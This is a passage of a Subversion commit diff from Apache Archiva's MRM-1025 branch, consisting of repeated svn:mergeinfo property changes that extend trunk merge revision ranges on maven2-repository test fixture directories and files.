-/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:825850-883981,889228-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:825850-883981,889228-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:825850-883981,889228-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:825850-883981,889228-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:825850-883981,889228-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:825850-883981,889228-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:825850-883981,883982-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:825850-883981,883982-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:825850-882383,883982-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:825850-882383,883982-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:825850-882383,885006-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:825850-882383,885006-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:825850-882383,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency:825850-882383,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:825850-882383,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree:825850-882383,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:825850-882383,885006-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2:825850-882383,885006-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:825850-882383,885006-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.xml:825850-882383,885006-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:699795-705848 